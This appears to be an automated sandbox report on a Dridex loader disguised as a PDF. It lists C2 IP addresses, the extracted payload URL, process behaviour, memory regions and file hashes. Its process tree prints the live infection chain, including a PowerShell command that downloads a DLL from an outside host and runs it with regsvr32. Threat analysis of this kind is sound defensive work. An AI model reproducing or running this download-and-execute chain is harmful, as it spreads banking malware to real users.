Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
12-01-2021 15:10
Static task
static1
Behavioral task
behavioral1
Sample
Documentation_N00467290036012021.pdf.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
Documentation_N00467290036012021.pdf.exe
Resource
win10v20201028
General
-
Target
Documentation_N00467290036012021.pdf.exe
Malware Config
Extracted
http://pecas24.mypart.pt/l0sjk3o.dll
Extracted
dridex
10555
77.220.64.37:443
80.86.91.27:3308
5.100.228.233:3389
46.105.131.65:1512
Signatures
-
Processes:
resource yara_rule behavioral2/memory/412-21-0x0000000000400000-0x000000000043D000-memory.dmp dridex_ldr -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 12 2388 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
regsvr32.exepid process 412 regsvr32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2388 powershell.exe 2388 powershell.exe 2388 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2388 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
Documentation_N00467290036012021.pdf.execmd.exedescription pid process target process PID 500 wrote to memory of 2444 500 Documentation_N00467290036012021.pdf.exe cmd.exe PID 500 wrote to memory of 2444 500 Documentation_N00467290036012021.pdf.exe cmd.exe PID 500 wrote to memory of 2444 500 Documentation_N00467290036012021.pdf.exe cmd.exe PID 2444 wrote to memory of 2764 2444 cmd.exe PING.EXE PID 2444 wrote to memory of 2764 2444 cmd.exe PING.EXE PID 2444 wrote to memory of 2764 2444 cmd.exe PING.EXE PID 2444 wrote to memory of 2388 2444 cmd.exe powershell.exe PID 2444 wrote to memory of 2388 2444 cmd.exe powershell.exe PID 2444 wrote to memory of 2388 2444 cmd.exe powershell.exe PID 2444 wrote to memory of 412 2444 cmd.exe regsvr32.exe PID 2444 wrote to memory of 412 2444 cmd.exe regsvr32.exe PID 2444 wrote to memory of 412 2444 cmd.exe regsvr32.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe"C:\Users\Admin\AppData\Local\Temp\Documentation_N00467290036012021.pdf.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\appdata\8tttqwre8ttde8gbhsad\DVP.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping certificaton.comö¥ÿ參«¢⌐ª¼ôÅñÅ₧íúÄÉ«¡»ƒêï£Ö₧ñ£àŃÄäûîÜôÖɺîèúöì»êü¡áÄùÆìéñëèîïÑóÆîáÉó¿Æ░¥ñëââóÖí₧«ïÖö«ò¥òùôöë¿úôùô½ÖÖƽåîÑçê¬Ñª£Ñàç¿û¼î¡üªâÿí«3⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('http://pecas24.mypart.pt/l0sjk3o.dll','C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dll');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 -s g7t5jgtz.dll3⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\g7t5jgtz.dllMD5
68183c1d9929e5502729e95454eca8e0
SHA1cfd4c7413fa9216afef60201895c3a620ea6801c
SHA2569e39f4494952dfedc6608ebad6c832474045bfaba3ccbb69f8194a2681311eac
SHA51298fa8564b0da7d8286819e1bf174ec84b4dc922f327e1397db8b08d5ab61637da39a79d0bf66f793e1381ca83de896c130bc03a45181bc4af237a5295ca738e7
-
C:\appdata\8tttqwre8ttde8gbhsad\DVP.batMD5
81d658043ac19d8986499c186989b544
SHA16ee49ab2e93ca3768cb9e82a821232b2114fd1d7
SHA256dca939a8caadd5061a857b7d16e3620e5276e04d64389cf5b8ac6cf50b476c6a
SHA51274349e48e27d380e65ab646e09aa2d05c3cc6960dee0678cc319bf0c3d0f6406157cb45fe35c8f885aa59d060c5355bfacb6b9a1752bd67b13c455ecc2d9d042
-
\Users\Admin\AppData\Local\Temp\g7t5jgtz.dllMD5
68183c1d9929e5502729e95454eca8e0
SHA1cfd4c7413fa9216afef60201895c3a620ea6801c
SHA2569e39f4494952dfedc6608ebad6c832474045bfaba3ccbb69f8194a2681311eac
SHA51298fa8564b0da7d8286819e1bf174ec84b4dc922f327e1397db8b08d5ab61637da39a79d0bf66f793e1381ca83de896c130bc03a45181bc4af237a5295ca738e7
-
memory/412-18-0x0000000000000000-mapping.dmp
-
memory/412-21-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/2388-12-0x0000000007F80000-0x0000000007F81000-memory.dmpFilesize
4KB
-
memory/2388-14-0x0000000008880000-0x0000000008881000-memory.dmpFilesize
4KB
-
memory/2388-9-0x0000000007610000-0x0000000007611000-memory.dmpFilesize
4KB
-
memory/2388-10-0x0000000007F00000-0x0000000007F01000-memory.dmpFilesize
4KB
-
memory/2388-11-0x00000000076E0000-0x00000000076E1000-memory.dmpFilesize
4KB
-
memory/2388-5-0x0000000000000000-mapping.dmp
-
memory/2388-13-0x0000000007ED0000-0x0000000007ED1000-memory.dmpFilesize
4KB
-
memory/2388-8-0x0000000007760000-0x0000000007761000-memory.dmpFilesize
4KB
-
memory/2388-15-0x00000000086A0000-0x00000000086A1000-memory.dmpFilesize
4KB
-
memory/2388-16-0x0000000009E40000-0x0000000009E41000-memory.dmpFilesize
4KB
-
memory/2388-17-0x00000000093C0000-0x00000000093C1000-memory.dmpFilesize
4KB
-
memory/2388-7-0x0000000006F30000-0x0000000006F31000-memory.dmpFilesize
4KB
-
memory/2388-6-0x00000000727A0000-0x0000000072E8E000-memory.dmpFilesize
6.9MB
-
memory/2444-2-0x0000000000000000-mapping.dmp
-
memory/2764-4-0x0000000000000000-mapping.dmp